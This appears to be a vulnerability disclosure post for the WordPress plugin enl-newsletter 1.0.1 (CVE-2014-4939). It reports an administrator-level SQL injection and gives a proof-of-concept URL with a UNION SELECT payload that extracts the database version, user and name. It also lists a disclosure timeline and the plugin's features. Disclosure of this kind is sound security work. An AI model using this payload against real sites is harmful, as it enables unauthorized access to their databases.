wp-plugin : enl-newsletter – A1-Injection

 

Plugin Details

 

Plugin Name : enl-newsletter

 

Effected Version : 1.0.1 (and most probably lower version's if any)

 
Vulnerability : A1-Injection
 
Identified by : Anant Shrivastava

 

 

Technical Details

 

Minimum Level of Access Required : Administrator

 

PoC - (Proof of Concept) :

 

http://localhost/wp-admin/admin.php?page=enl-add-new&id=2 union select 1,@@version,3,user(),database(),6,7,8,9,0,1

 

Disclosure Timeline

 

Vendor Contacted : 2013-12-28

 
Plugin Status : No Change
 
Public Disclosure : May 28, 2014
 
CVE Number : CVE-2014-4939

 
Plugin Description :
 
**Main Features:**

1. Setup multiple newsletters according to the post categories.
2. Different send modes include manual, weekly and monthly.
3. Custom newsletter content, template and post count.
4. Newsletter signup widget for user registration.
5. Subscriber info list containing email, ip and registeration time.
6. Import wordpress users to subscriber list.

**More info:**

* [Leave a comment](http://www.wp-coder.net/enl-newsletter/)

Leave a Reply

Your email address will not be published. Required fields are marked *